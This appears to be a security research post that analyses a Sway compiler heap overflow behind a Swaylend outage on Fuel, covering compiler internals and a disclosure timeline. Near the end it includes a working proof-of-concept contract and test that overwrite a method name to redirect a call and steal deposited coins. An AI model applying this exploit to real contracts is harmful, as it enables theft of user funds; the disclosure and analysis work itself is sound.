A Preventable Two-Day Shutdown Caused by a Compiler Bug

Long Story Short

Compiler vulnerabilities tend to be overlooked because compiler developers may perceive them as either having little to no consequences or being easily avoidable in the final DApps. However, DApp developers, unaware of these compiler bugs, are likely to fail to detect the unintended effects those bugs have on their products. The information gap between the two groups can lead to severe incidents, resulting in significant financial loss. A notable example is the Vyper reentrancy bug, which led to the loss of over $26 million from smart contracts.

In this article, we will dive into the details of the Fuel-Swaylend buffer overflow vulnerability, which led to an incident where the contract was halted for 2 days. The story begins with an issue reported by our team during the Fuel Attackathon, an audit competition held on Immunefi, along with 20+ other Sway miscompilation bugs. These bugs, however, were not prioritized for immediate fixing.

Months later, shortly after Fuel launched its mainnet, we noticed Swaylend transactions failing with error code 123. This error, which rarely occurs under normal operation, coincided with the impact of one of the compiler bugs we had reported during the Attackathon. Our further investigation confirmed that the bug was indeed the root cause. Consequently, Swaylend was paused until the compiler bug was fixed and a newly recompiled version was deployed. However, a 2-day shutdown had already occurred.

While the bugs we reported were initially not considered high priority, the incident highlighted their potential severity, prompting further attention to these issues. Some of the bugs still remain unresolved, pointing to the need for ongoing vigilance in addressing compiler-related vulnerabilities.

Now, let’s explore the technical details in more depth, shall we? :)

The Incident

Discovery

While casually browsing through Fuel transactions, we noticed certain Swaylend transactions were failing with error code 123. This was alarming, as code 123 is reserved for mismatched selector reverts: in other words, calling an unknown function of an external contract.

pub(crate) const MISMATCHED_SELECTOR_REVERT_CODE: u32 = 123;

impl<'a, 'b> EncodingAutoImplContext<'a, 'b>
where
    'a: 'b,
{
    ...
    pub(crate) fn generate_contract_entry(
        &mut self,
        engines: &Engines,
        program_id: Option<ProgramId>,
        contract_fns: &[DeclId<TyFunctionDecl>],
        fallback_fn: Option<DeclId<TyFunctionDecl>>,
        handler: &Handler,
    ) -> Result<TyAstNode, ErrorEmitted> {
        ...
        let fallback = if let Some(fallback_fn) = fallback_fn {
            ...
        } else {
            // as the old encoding does
            format!("__revert({});", MISMATCHED_SELECTOR_REVERT_CODE)
        };
        ...
    }
    ...
}
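
To make the role of this fallback concrete, here is a minimal Rust model of selector dispatch. It is only a sketch: the `dispatch` helper and the method names in the match arms are hypothetical stand-ins, not the code the Sway compiler actually generates. Only the revert code 123 comes from the source quoted above.

```rust
/// Revert code taken from the compiler source quoted above.
const MISMATCHED_SELECTOR_REVERT_CODE: u32 = 123;

/// Hypothetical model of a generated contract entry: compare the decoded
/// method name against the known ABI methods, otherwise revert with 123.
/// The method names below are illustrative assumptions.
fn dispatch(method_name: &[u8]) -> Result<&'static str, u32> {
    match method_name {
        b"update_price_feeds_if_necessary" => Ok("update_price_feeds_if_necessary"),
        b"update_fee" => Ok("update_fee"),
        // No fallback function is defined, so behave like `__revert(123)`.
        _ => Err(MISMATCHED_SELECTOR_REVERT_CODE),
    }
}
```

In this model, `dispatch(b"update_price_feeds_if_necessary")` is routed to its handler, while any name that differs by even one byte falls through to the revert. That is why a corrupted method name surfaces as error code 123 rather than as a more descriptive failure.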

Such errors rarely occur during normal operation. Moreover, this coincided with an observable artifact of one of the compiler bugs we reported during the Fuel Attackathon, leading us to suspect that it might have a similar root cause. We will walk you through our journey of investigating the issue, as well as highlight key takeaways.

Investigation

Starting with the failing transaction, we first need to gather information on what happened. The Operations section of the transaction provides a simple overview of the events. It shows that the execution begins with a script calling the Swaylend proxy contract (0x657ab45a6eb98a4893a99fd104347179151e8b3828fd8f2a108cc09770d1ebae), which then calls the Pyth oracle contract (0x1c86fdd9e0e7bc0d2ae1bf6817ef4834ffa7247655701ee1b031b52a24c523da) before reverting. While this is helpful, it doesn’t reveal which function of the Swaylend contract was called. To determine that, we need to examine the script.

The script, along with the script data, can be obtained from the advanced transaction view. The script itself is quite short, and when plugged into the disassembler, the logic is also fairly straightforward: it simply calls a contract with parameters from the script data.

byte   op                                                                                 notes  
0      MOVI { dst: 0x10, val: 10432 }                                                     point reg 0x10 to param in script data
4      MOVI { dst: 0x11, val: 10392 }                                                     load amount of coins to forward into reg 0x11 from scriptdata
8      LW { dst: 0x11, addr: 0x11, offset: 0 }                                            
12     MOVI { dst: 0x12, val: 10400 }                                                     point reg 0x12 to asset_id in script data          
16     CALL { target_struct: 0x10, fwd_coins: 0x11, asset_id_addr: 0x12, fwd_gas: 0xa }            
20     RET { value: 0x1 }

Let’s examine the script data to identify which function is called. Looking at the core library, we see that target_struct (or params) is the serialization of 3 fields: contract_id, a pointer to the encoded method_name, and a pointer to the encoded function arguments.

pub fn contract_call<T, TArgs>(
    contract_id: b256,
    method_name: str,
    args: TArgs,
    coins: u64,
    asset_id: b256,
    gas: u64,
) -> T
where
    T: AbiDecode,
    TArgs: AbiEncode,
{
    let first_parameter = encode(method_name);
    let second_parameter = encode(args);
    let params = encode((
        contract_id,
        asm(a: first_parameter.ptr()) {
            a: u64
        },
        asm(a: second_parameter.ptr()) {
            a: u64
        },
    ));

    __contract_call(params.ptr(), coins, asset_id, gas);
    let ptr = asm() {
        ret: raw_ptr
    };
    let len = asm() {
        retl: u64
    };

    let mut buffer = BufferReader::from_parts(ptr, len);
    T::abi_decode(buffer)
}

Cross-referencing it with the script data, we find that the contract_id is 0x657ab45a6eb98a4893a99fd104347179151e8b3828fd8f2a108cc09770d1ebae, which matches the call we observed earlier. The method pointer points to the address 0x28f0 which holds the string withdraw_collateral with its length prepended. From the Swaylend contract, we find the function signature for withdraw_collateral is fn withdraw_collateral(asset_id: AssetId, amount: u64, price_data_update: PriceDataUpdate). We then proceed to decode the arguments as (AssetId, u64, PriceDataUpdate). The respective fields are annotated below (type definitions).

0x2890(10384) :                         00 00 00 00 00 00 00 07 
0x28a0(10400) : f8 f8 b6 28 3d 7f a5 b6 72 b5 30 cb b8 4f cc cb 
0x28b0(10416) : 4f f8 dc 40 f8 17 6e f4 54 4d db 1f 19 52 ad 07 
0x28c0(10432) : 65 7a b4 5a 6e b9 8a 48 93 a9 9f d1 04 34 71 79  <- call contract_id (start of encoded params structure)
0x28d0(10448) : 15 1e 8b 38 28 fd 8f 2a 10 8c c0 97 70 d1 eb ae 
0x28e0(10464) : 00 00 00 00 00 00 28 f0 00 00 00 00 00 00 29 0b  <- method ptr / args ptr
0x28f0(10480) : 00 00 00 00 00 00 00 13                          <- method name length
                                        77 69 74 68 64 72 61 77  <- method name ("withdraw_collateral")
0x2900(10496) : 5f 63 6f 6c 6c 61 74 65 72 61 6c 
                                                 f8 f8 b6 28 3d  <- asset_id
0x2910(10512) : 7f a5 b6 72 b5 30 cb b8 4f cc cb 4f f8 dc 40 f8 
0x2920(10528) : 17 6e f4 54 4d db 1f 19 52 ad 07 
                                                 00 00 00 00 00  <- amount 
0x2930(10544) : 0f 42 40 
                         00 00 00 00 00 00 00 07                 <- price_data_update.update_fee = 7
                                                 00 00 00 00 00  <- price_data_update.publish_times = Vec<u64> with len 7
0x2940(10560) : 00 00 07 40 00 00 00 67 24 e0 72 40 00 00 00 67
0x2950(10576) : 24 e0 72 40 00 00 00 67 24 e0 72 40 00 00 00 67 
0x2960(10592) : 24 e0 72 40 00 00 00 67 24 e0 72 40 00 00 00 67 
0x2970(10608) : 24 e0 72 40 00 00 00 67 24 e0 72 
                                                 00 00 00 00 00  <- price_data_update.price_feed_ids = Vec<PriceFeedId> with len 7
0x2980(10624) : 00 00 07
                         ea a0 20 c6 1c c4 79 71 28 13 46 1c e1 
0x2990(10640) : 53 89 4a 96 a6 c0 0b 21 ed 0c fc 27 98 d1 f9 a9 
              :	               ...
0x2a50(10832) : 52 b8 36 45 13 f6 ab 1c ca 5e d3 f1 f7 b5 44 89 
0x2a60(10848) : 80 e7 84 
                         00 00 00 00 00 00 00 01                 <- price_data_update.update_data = Vec<Bytes> with len 1
                                                 00 00 00 00 00  <- price_data_update.update_data[0] = Bytes with len 0xba3
0x2a70(10864) : 00 0b a3
                         50 4e 41 55 01 00 00 00 03 b8 01 00 00 
0x2a80(10880) : 00 04 0d 00 6a 9a 96 8b 05 c6 1c 4e 33 a6 ce d1 
              :                       ...
0x3600(13840) : 37 7e ea 97 08 ec dc 32 d3 1b 6b 0a 97 61 1e b5
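
The manual decoding above can also be sketched in code. The following Rust snippet is a minimal illustration, assuming the layout read off the hex dump: a 32-byte contract_id, then two big-endian u64 pointers, with the method name stored as a u64 length followed by its bytes. `CallParams`, `read_u64`, and `decode_call_params` are hypothetical names introduced here, not part of any Fuel tooling.

```rust
use std::convert::{TryFrom, TryInto};

/// Decoded view of the `params` structure handed to the CALL instruction.
#[derive(Debug, PartialEq)]
struct CallParams {
    contract_id: [u8; 32],
    method_name: String,
    args_ptr: u64,
}

/// Read a big-endian u64 at absolute address `addr`, where `mem[0]`
/// holds the byte located at address `base`.
fn read_u64(mem: &[u8], base: u64, addr: u64) -> Option<u64> {
    let start = usize::try_from(addr.checked_sub(base)?).ok()?;
    let bytes = mem.get(start..start.checked_add(8)?)?;
    Some(u64::from_be_bytes(bytes.try_into().ok()?))
}

/// Decode contract_id, the method name behind the method pointer,
/// and the raw args pointer. Returns None on any out-of-range access.
fn decode_call_params(mem: &[u8], base: u64, params_addr: u64) -> Option<CallParams> {
    let off = usize::try_from(params_addr.checked_sub(base)?).ok()?;
    let contract_id: [u8; 32] = mem.get(off..off.checked_add(32)?)?.try_into().ok()?;
    let method_ptr = read_u64(mem, base, params_addr.checked_add(32)?)?;
    let args_ptr = read_u64(mem, base, params_addr.checked_add(40)?)?;

    // The method name is length-prefixed: 8 bytes of length, then the bytes.
    let name_len = usize::try_from(read_u64(mem, base, method_ptr)?).ok()?;
    let name_start = usize::try_from(method_ptr.checked_sub(base)?)
        .ok()?
        .checked_add(8)?;
    let name = mem.get(name_start..name_start.checked_add(name_len)?)?;

    Some(CallParams {
        contract_id,
        method_name: String::from_utf8(name.to_vec()).ok()?,
        args_ptr,
    })
}
```

Fed the bytes starting at 0x28c0 with `base` and `params_addr` both set to 0x28c0, this layout yields the method pointer 0x28f0, a 0x13-byte name, and the args pointer 0x290b, which is exactly 0x28f0 + 8 + 0x13.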

Bug Analysis

Now that we know withdraw_collateral is called and have its arguments, we are ready to dive into the code. We also know the actual failure occurs when calling the Pyth contract, so let’s jump directly to update_price_feeds_if_necessary_internal within withdraw_collateral, where the Pyth contract is called. This is where things start getting interesting. The failure happens after calling oracle.update_price_feeds_if_necessary, but Swaylend uses the correct ABI, so what can possibly go wrong?

impl Market for Contract {
    ...
    #[payable, storage(write)]
    fn withdraw_collateral(
        asset_id: AssetId,
        amount: u64,
        price_data_update: PriceDataUpdate,
    ) {
        ...
        // Update price data
        update_price_feeds_if_necessary_internal(price_data_update);
        ...
    }
    ...
}

#[payable, storage(read)]
fn update_price_feeds_if_necessary_internal(price_data_update: PriceDataUpdate) {
    let contract_id = storage.pyth_contract_id.read();
    ...
    let oracle = abi(PythCore, contract_id.bits());
    oracle
        .update_price_feeds_if_necessary {
            asset_id: AssetId::base().bits(),
            coins: price_data_update.update_fee,
        }(
            price_data_update
                .price_feed_ids,
            price_data_update
                .publish_times,
            price_data_update
                .update_data,
        );
}

This brings us to the compiler internals of Fuel. For contract ABI method calls, Fuel automatically translates them into the contract_call function defined in the core library, which we’ve already shown above. So, we can mentally unpack oracle.update_price_feeds_if_necessary into an explicit call instead.

pub(crate) fn type_check_method_application(
    handler: &Handler,
    mut ctx: TypeCheckContext,
    mut method_name_binding: TypeBinding<MethodName>,
    contract_call_params: Vec<StructExpressionField>,
    arguments: &[Expression],
    span: Span,
) -> Result<ty::TyExpression, ErrorEmitted> {
    ...
    if ctx.experimental.new_encoding && method.is_contract_call {
        fn call_contract_call(
            ctx: &mut TypeCheckContext,
            original_span: Span,
            return_type: TypeId,
            method_name_expr: Expression,
            _caller: Expression,
            arguments: Vec<Expression>,
            typed_arguments: Vec<TypeId>,
            coins_expr: Expression,
            asset_id_expr: Expression,
            gas_expr: Expression,
        ) -> Expression {
            ...
            Expression {
                kind: ExpressionKind::FunctionApplication(Box::new(
                    FunctionApplicationExpression {
                        call_path_binding: TypeBinding {
                            inner: CallPath {
                                prefixes: vec![],
                                suffix: Ident::new_no_span("contract_call".into()),
                                is_absolute: false,
                            },
                            type_arguments: TypeArgs::Regular(vec![
                                TypeArgument {
                                    type_id: return_type,
                                    initial_type_id: return_type,
                                    span: Span::dummy(),
                                    call_path_tree: None,
                                },
                                TypeArgument {
                                    type_id: tuple_args_type_id,
                                    initial_type_id: tuple_args_type_id,
                                    span: Span::dummy(),
                                    call_path_tree: None,
                                },
                            ]),
                            span: Span::dummy(),
                        },
                        resolved_call_path_binding: None,
                        arguments: vec![
                            Expression {
                                kind: ExpressionKind::Literal(Literal::B256([0u8; 32])),
                                span: Span::dummy(),
                            },
                            method_name_expr,
                            as_tuple(arguments),
                            coins_expr,
                            asset_id_expr,
                            gas_expr,
                        ],
                    },
                )),
                span: original_span,
            }
        }
        ...
        let contract_call = call_contract_call(
            &mut ctx,
            span,
            method.return_type.type_id,
            string_slice_literal(&method.name),
            old_arguments.first().cloned().unwrap(),
            args,
            arguments.iter().map(|x| x.1.return_type).collect(),
            coins_expr,
            asset_id_expr,
            gas_expr,
        );
        ...
    }
    ...
}

contract_call is responsible for several tasks: serializing the arguments, calling the external contract, and then deserializing the return value. The panic occurred when an external contract was called and the function name could not be found. This indicates either the serialized function name provided to the external contract is incorrect, or the function dispatching in the external contract does not work properly.

Before we dig further into the Swaylend incident, let’s take a step back and discuss the compiler bug we mentioned earlier, which we discovered during the Fuel Attackathon. This will provide important context for the Swaylend case when we revisit it later.

The codec library defines a trait called AbiEncode used for encoding data. Any structures passed across contract boundaries must implement this trait for the compiler to be able to serialize them.

pub trait AbiEncode {
    fn abi_encode(self, buffer: Buffer) -> Buffer;
}

At the core of the trait is a Buffer structure, which is used to track encoded data. A Buffer is created with the __encode_buffer_empty intrinsic, and the serialized bytes of each structure are appended to it through the __encode_buffer_append intrinsic. Once encoding is complete, the Buffer is converted into a raw_slice using the __encode_buffer_as_raw_slice intrinsic.

pub struct Buffer {
    buffer: (raw_ptr, u64, u64), // ptr, capacity, size
}

impl Buffer {
    pub fn new() -> Self {
        Buffer {
            buffer: __encode_buffer_empty(),
        }
    }
}

impl AbiEncode for bool {
    fn abi_encode(self, buffer: Buffer) -> Buffer {
        Buffer {
            buffer: __encode_buffer_append(buffer.buffer, self),
        }
    }
}

pub fn encode<T>(item: T) -> raw_slice
where
    T: AbiEncode,
{
    let buffer = item.abi_encode(Buffer::new());
    buffer.as_raw_slice()
}

impl AsRawSlice for Buffer {
    fn as_raw_slice(self) -> raw_slice {
        __encode_buffer_as_raw_slice(self.buffer)
    }
}

While the usage of all these intrinsics may seem overwhelming at first, the compiler implementations are actually quite simple.

In EncodeBufferEmpty, the compiler allocates a memory chunk of size 1024, and packs the (ptr, capacity = 1024, len = 0) tuple into the Buffer structure before returning it.

Intrinsic::EncodeBufferEmpty => {
    assert!(arguments.is_empty());

    let uint64 = Type::get_uint64(context);

    // let cap = 1024;
    let cap = Value::new_constant(
        context,
        Constant {
            ty: uint64,
            value: ConstantValue::Uint(1024),
        },
    );

    // let ptr = asm(cap: cap) {
    //  aloc cap;
    //  hp: u64
    // }
    let args = vec![AsmArg {
        name: Ident::new_no_span("cap".into()),
        initializer: Some(cap),
    }];
    let body = vec![AsmInstruction {
        op_name: Ident::new_no_span("aloc".into()),
        args: vec![Ident::new_no_span("cap".into())],
        immediate: None,
        metadata: None,
    }];
    let ptr = self.current_block.append(context).asm_block(
        args,
        body,
        uint64,
        Some(Ident::new_no_span("hp".into())),
    );

    let ptr_u8 = Type::new_ptr(context, Type::get_uint8(context));
    let ptr = self.current_block.append(context).int_to_ptr(ptr, ptr_u8);

    let len = Constant::new_uint(context, 64, 0);
    let len = Value::new_constant(context, len);
    let buffer = self.compile_to_encode_buffer(context, ptr, cap, len)?;
    Ok(TerminatorValue::new(buffer, context))
}

Appending to the Buffer is slightly more involved, but it can be broken down into a few simple steps:

Calculate the address of &Buffer.ptr[Buffer.len].
Store the encoded data at the calculated address.
Increase Buffer.len.

Intrinsic::EncodeBufferAppend => {
    assert!(arguments.len() == 2);

    let buffer = &arguments[0];
    let buffer = return_on_termination_or_extract!(
        self.compile_expression_to_value(context, md_mgr, buffer)?
    );

    let (ptr, cap, len) = self.compile_buffer_into_parts(context, buffer)?;

    // Append item
    let item = &arguments[1];
    let item_span = item.span.clone();
    let item_type = engines.te().get(item.return_type);
    let item = return_on_termination_or_extract!(
        self.compile_expression_to_value(context, md_mgr, item)?
    );

    // Define some helper functions
    fn increase_len(
        current_block: &mut Block,
        context: &mut Context,
        len: Value,
        step: u64,
    ) -> Value {
        assert!(len.get_type(context).unwrap().is_uint64(context));

        let uint64 = Type::get_uint64(context);
        let step = Value::new_constant(
            context,
            Constant {
                ty: uint64,
                value: ConstantValue::Uint(step),
            },
        );
        current_block
            .append(context)
            .binary_op(BinaryOpKind::Add, len, step)
    }

    fn calc_addr_as_ptr(
        current_block: &mut Block,
        context: &mut Context,
        ptr: Value,
        len: Value,
        ptr_to: Type,
    ) -> Value {
        assert!(ptr.get_type(context).unwrap().is_ptr(context));
        assert!(len.get_type(context).unwrap().is_uint64(context));

        let uint64 = Type::get_uint64(context);
        let ptr = current_block.append(context).ptr_to_int(ptr, uint64);
        let addr = current_block
            .append(context)
            .binary_op(BinaryOpKind::Add, ptr, len);

        let ptr_to = Type::new_ptr(context, ptr_to);
        current_block.append(context).int_to_ptr(addr, ptr_to)
    }

    fn append_with_store(
        current_block: &mut Block,
        context: &mut Context,
        addr: Value,
        len: Value,
        item: Value,
    ) -> Value {
        assert!(addr.get_type(context).unwrap().is_ptr(context));
        assert!(addr
            .get_type(context)
            .unwrap()
            .get_pointee_type(context)
            .unwrap()
            .eq(context, &item.get_type(context).unwrap()));

        let _ = current_block.append(context).store(addr, item);

        let uint64 = Type::get_uint64(context);
        let step = Value::new_constant(
            context,
            Constant {
                ty: uint64,
                value: ConstantValue::Uint(1),
            },
        );
        current_block
            .append(context)
            .binary_op(BinaryOpKind::Add, len, step)
    }

    // Actual operation starts from here
    let new_len = match &*item_type {
        TypeInfo::Boolean => {
            assert!(item.get_type(context).unwrap().is_bool(context));
            let addr = calc_addr_as_ptr(
                &mut self.current_block,
                context,
                ptr,
                len,
                Type::get_bool(context),
            );
            append_with_store(&mut self.current_block, context, addr, len, item)
        }
        ...
    }

    let buffer = self.compile_to_encode_buffer(context, ptr, cap, new_len)?;

    Ok(TerminatorValue::new(buffer, context))
}

And EncodeBufferAsRawSlice packs Buffer.ptr and Buffer.len into a raw_slice structure.

Intrinsic::EncodeBufferAsRawSlice => {
    assert!(arguments.len() == 1);

    let buffer = &arguments[0];
    let buffer = return_on_termination_or_extract!(
        self.compile_expression_to_value(context, md_mgr, buffer)?
    );

    let uint64 = Type::get_uint64(context);
    let (ptr, _, len) = self.compile_buffer_into_parts(context, buffer)?;
    let ptr = self.current_block.append(context).ptr_to_int(ptr, uint64);
    let slice_as_tuple = self.compile_tuple_from_values(
        context,
        vec![ptr, len],
        vec![uint64, uint64],
        None,
    )?;

    //asm(s: (ptr, len)) {
    //  s: raw_slice
    //};
    let return_type = Type::get_slice(context);
    let buffer = self.current_block.append(context).asm_block(
        vec![AsmArg {
            name: Ident::new_no_span("s".into()),
            initializer: Some(slice_as_tuple),
        }],
        vec![],
        return_type,
        Some(Ident::new_no_span("s".into())),
    );

    Ok(TerminatorValue::new(buffer, context))
}

It is clear that EncodeBufferAppend contains a critical bug: the capacity is carried along but never checked, so the buffer is never resized when the encoded data exceeds the 1024 bytes originally allocated. If the encoded data is large, the append operation will silently overflow the allocated heap memory and overwrite subsequent data.

So, what consequences could this bug have? To answer that, we need to understand what lies after the overflowed data chunk. The Fuel VM heap grows from high memory towards low memory and never garbage collects. Thus chunks allocated later are always placed at lower memory addresses than those allocated earlier. As a result, a sufficiently large overflow on a newer chunk can always overwrite data in an older chunk.

         Fuel VM Heap Layout
+-----------------------------------+ <- High Memory (Start of Heap)
|  Older Allocated Chunks           |
|  .                                |  ⬆
|  .                                |  ⬆ (overflow old chunks)
|  .                                |  ⬆
+-----------------------------------+  ⬆
|  Newer Allocated Chunk            |  ⬆ writing direction
+-----------------------------------+ 
|  (Free Space)                     |
|                                   |
+-----------------------------------+ <- Low Memory (End of Heap)

In contract_call, we can identify 3 encodings at play. The method_name is generally hardcoded and short, making it unlikely to overflow during encoding. On the other hand, the args are often user-controllable and can have dynamic lengths, and are thus susceptible to overflow. The same applies to params. Since method_name is encoded before args, the heap chunk backing the Buffer for first_parameter (method_name) is allocated earlier, and therefore sits at a higher address, than the heap chunk backing the Buffer for second_parameter (args). This means a sufficiently long args value can overflow during encoding and overwrite the method_name being called, resulting in the unknown function name error we observed.
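
The interaction between the two buffers can be reproduced in a toy model. The Rust sketch below is an assumption-laden simplification, not the Fuel VM: `Heap`, `Buffer`, `append_unchecked`, and `method_name_after_encoding` are hypothetical names, the 8192-byte memory is arbitrary, and only the 1024-byte initial capacity and the downward-growing heap come from the text above. Inputs large enough to run past the toy memory would simply panic.

```rust
use std::convert::{TryFrom, TryInto};

const INITIAL_CAP: usize = 1024; // capacity used by EncodeBufferEmpty

/// Toy heap that grows from high addresses toward low ones.
struct Heap {
    mem: Vec<u8>,
    hp: usize, // heap pointer: lowest allocated address so far
}

/// Mirrors the (ptr, capacity, size) tuple of the Sway Buffer.
#[derive(Clone, Copy)]
struct Buffer {
    ptr: usize,
    cap: usize, // recorded, but never consulted: that is the bug
    len: usize,
}

impl Heap {
    fn new(size: usize) -> Self {
        Heap { mem: vec![0; size], hp: size }
    }

    /// Like `aloc`: move the heap pointer down and return the new chunk.
    fn aloc(&mut self, n: usize) -> usize {
        self.hp -= n;
        self.hp
    }

    /// Buggy append: writes at ptr + len without comparing against cap.
    fn append_unchecked(&mut self, buf: Buffer, data: &[u8]) -> Buffer {
        let start = buf.ptr + buf.len;
        self.mem[start..start + data.len()].copy_from_slice(data);
        Buffer { len: buf.len + data.len(), ..buf }
    }

    /// Encode a length-prefixed byte string into a fresh 1024-byte Buffer.
    fn encode_bytes(&mut self, data: &[u8]) -> Buffer {
        let buf = Buffer { ptr: self.aloc(INITIAL_CAP), cap: INITIAL_CAP, len: 0 };
        let buf = self.append_unchecked(buf, &(data.len() as u64).to_be_bytes());
        self.append_unchecked(buf, data)
    }

    /// Read back the length-prefixed string at `ptr`, if it is well-formed.
    fn read_name(&self, ptr: usize) -> Option<Vec<u8>> {
        let len_bytes: [u8; 8] = self.mem.get(ptr..ptr + 8)?.try_into().ok()?;
        let len = usize::try_from(u64::from_be_bytes(len_bytes)).ok()?;
        let start = ptr + 8;
        self.mem.get(start..start.checked_add(len)?).map(|s| s.to_vec())
    }
}

/// Encode method_name first and args second, as contract_call does,
/// then return the method name the callee would end up seeing.
fn method_name_after_encoding(method_name: &[u8], args: &[u8]) -> Option<Vec<u8>> {
    let mut heap = Heap::new(8192);
    let name_buf = heap.encode_bytes(method_name);
    let _args_buf = heap.encode_bytes(args);
    heap.read_name(name_buf.ptr)
}
```

With short args the method name survives untouched. Once the encoded args exceed 1024 bytes, the excess lands at the start of the method_name chunk: arbitrary bytes there produce an unreadable name, while bytes chosen by the caller can replace the name outright.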

Returning to Swaylend, is this what happened? Close, but not exactly. It turns out the Fuel team had attempted to fix this bug at one point. In this commit, they added code to double the size of the Buffer whenever it runs out of space. Unfortunately, doubling the buffer size was not enough to fully resolve the bug. Take the failing transaction as an example: the final field to serialize is 0xba3 bytes, and the entire param exceeds 0xc00 bytes. Since doubling the 1024-byte Buffer to 2048 bytes is not enough to store the entire param, the encoding still overflows into method_name, corrupting it.
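
The arithmetic behind this can be sketched in a few lines of Rust. This is only an illustration of the numbers quoted above, assuming the fix doubled the capacity once per append; we have not reproduced the exact logic of the commit, and both function names are hypothetical.

```rust
/// Capacity under the assumed fix: double once if the item does not fit.
fn capacity_after_single_doubling(cap: u64, len: u64, item: u64) -> u64 {
    if len.saturating_add(item) > cap {
        cap.saturating_mul(2)
    } else {
        cap
    }
}

/// A growth policy that keeps doubling until the item actually fits.
fn capacity_after_grow_to_fit(cap: u64, len: u64, item: u64) -> u64 {
    let needed = len.saturating_add(item);
    let mut new_cap = cap.max(1);
    while new_cap < needed {
        new_cap = new_cap.saturating_mul(2);
    }
    new_cap
}
```

For a single 0xba3-byte (2979-byte) item appended to an empty 1024-byte Buffer, one doubling gives 2048 bytes, which is still 931 bytes short. Doubling until the data fits gives 4096 bytes. Any resize policy has to be driven by the size of the data being appended, not by a fixed growth step.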

The End of the Story?

Reverting when it shouldn’t is bad enough on its own. But hold on—does an overflow always end with a revert? Let’s consider the bug more carefully. What if attackers craft their overflowing encoded argument carefully to control the method_name, directing it to an existing function rather than some corrupted data? The hypothetical DApp below demonstrates how this could turn the bug into a serious loss-of-funds issue. Readers are encouraged to take some time with this to truly understand how the bug works 0.<

contract;

use std::{
    bytes::Bytes,
    identity::Identity,
    asset::transfer,
    asset_id::AssetId,
    context::this_balance,
    auth::msg_sender,
};

abi VaultContract {
    #[storage(write)]
    fn initialize(manager:Identity);
    #[payable, storage(read)]
    fn deposit(data: Bytes);
    #[storage(read)]
    fn collect(amount: u64, receiver: Identity);
}

storage {
    manager: Identity = Identity::Address(Address::zero()),
    initialized: bool = false,
}

impl VaultContract for Contract {
    #[storage(write)]
    fn initialize(manager: Identity) {
        assert(storage.initialized.read() == false);
        storage.initialized.write(true);
        storage.manager.write(manager);
    }
    #[payable, storage(read)]
    fn deposit(data: Bytes) {
        assert(msg_sender().unwrap() == storage.manager.read());
        //ignore the bookkeeping of user balance since it's not important for the poc
        log(data);
    }
    #[storage(read)]
    fn collect(amount: u64, receiver: Identity) {
        assert(msg_sender().unwrap() == storage.manager.read());
        let mut actual_amount = amount;
        if (actual_amount > this_balance(AssetId::base())) {
            actual_amount = this_balance(AssetId::base());
        }
        transfer(receiver, AssetId::base(), actual_amount);
    }
}

contract;

use std::{
    bytes::Bytes,
    alloc::alloc,
    asset_id::AssetId,
    registers::global_gas,
    identity::Identity,
    address::Address,
    contract_id::ContractId,
    auth::msg_sender,
    call_frames::msg_asset_id,
    context::{
        msg_amount,
        balance_of,
    },
};

abi VaultContract {
    #[storage(write)]
    fn initialize(manager:Identity);
    #[payable, storage(read)]
    fn deposit(data: Bytes);
    #[storage(read)]
    fn collect(amount: u64, receiver: Identity);
}

abi ManagerContract {
    #[payable]
    fn deposit(data: Bytes);
    #[storage(read)]
    fn collect(amount: u64, receiver: Identity);
}

storage {
    admin: Identity = Identity::Address(Address::zero()),
}

impl ManagerContract for Contract {
    #[payable]
    fn deposit(data: Bytes) {
        assert(msg_asset_id() == AssetId::base());
        let vault_abi = abi(VaultContract, vault::CONTRACT_ID);
        vault_abi.deposit{asset_id: AssetId::base().bits(), coins: msg_amount()}(data);
    }

    #[storage(read)]
    fn collect(amount: u64, receiver: Identity) {
        assert(msg_sender().unwrap() == storage.admin.read());
        let vault_abi = abi(VaultContract, vault::CONTRACT_ID);
        vault_abi.collect(amount, receiver);
    }
}

#[test]
fn test() {
   // setup
   let vault_abi = abi(VaultContract, vault::CONTRACT_ID);
   vault_abi.initialize(Identity::ContractId(ContractId::from(CONTRACT_ID)));
   let manager_abi = abi(ManagerContract, CONTRACT_ID);
   manager_abi.deposit{asset_id: AssetId::base().bits(), coins: 100}(Bytes::new());
   assert(balance_of(ContractId::from(vault::CONTRACT_ID), AssetId::base()) == 100);

   // exploit
   let arg_len = 0x408;
   let arg = alloc::<u8>(8 + arg_len);
   arg.write::<u64>(arg_len);
   arg.add_uint_offset(0x3f8).write::<u64>(15); //overwrite name encode buffer length
   arg.add_uint_offset(0x400).write::<u64>(7); //overwrite name length
   arg.add_uint_offset(0x408).write::<u64>(0x636f6c6c65637400); //overwrite name
   __contract_call(
       encode((
           CONTRACT_ID,
           asm(a:encode("deposit").ptr()){a:u64},
           asm(a:arg){a:u64},
       )).ptr(),
       0, 
       AssetId::base().bits(),
       global_gas(),
   );
   assert(balance_of(ContractId::from(vault::CONTRACT_ID), AssetId::base()) == 100); //this fails because the overflow stole the coins
}

Besides controlling the method_name to redirect code execution, other attack vectors also exist. Since the overflow doesn’t necessarily stop at the method_name buffer, if other data is placed on the heap before the call, an attacker could tamper with that as well. The potential for powerful exploits built on this bug is considerable.

On the bright side for Swaylend, the Pyth contract they’re calling doesn’t have any functionality that could enable a more severe attack. Additionally, there’s also no useful data on the heap for an attacker to corrupt. This limits the impact of the bug to only transaction failures. However, other DApps may not be as fortunate. Our suggestion to Sway developers is to review your code for dynamic-length arguments passed between contracts. If there are any, recompile your contract with the latest version of the Sway compiler and upgrade it immediately.

Reflection

So, what can we learn from the incident, and why do we call this a “preventable” issue?
Let’s take a look at the reporting timeline:

6/19 : We reported the compiler bug to Fuel via Immunefi, but the report was automatically closed because the contest didn’t include an appropriate impact option. The custom impact we provided—“Incorrect Sway intrinsics leading to Fuel heap buffer overflow”—was deemed out of scope
7/1 : We reached out to Immunefi and received a response that they would ask Fuel to review the reports that were automatically, but incorrectly, closed
8/23 : Long after the end of the Attackathon, we reminded Immunefi and Fuel that the report had not been reviewed
8/26 : The report was once again automatically closed due to “out of scope” impacts
8/30 : The report was accepted, but its severity was downgraded from Critical to Low
8/30 : We provided the proof of concept DApp above to strengthen our claim that the bug could have severe impacts, but were unable to convince Fuel and Immunefi to reassess its severity
10/31: Two months later, we noticed transactions failing with error code 123 (mismatched selector reverts)
11/1 : Swaylend was halted
11/3 : Swaylend was recompiled and upgraded in this transaction

Compiler bug severities can be a source of contention. The main arguments for assigning a lower severity are:

Compiler bugs rarely make it to production. They are typically caught by DApp developers during testing and can easily be identified and fixed.
Compiler bugs don’t have an immediate impact, so by nature, they can’t be considered severe.
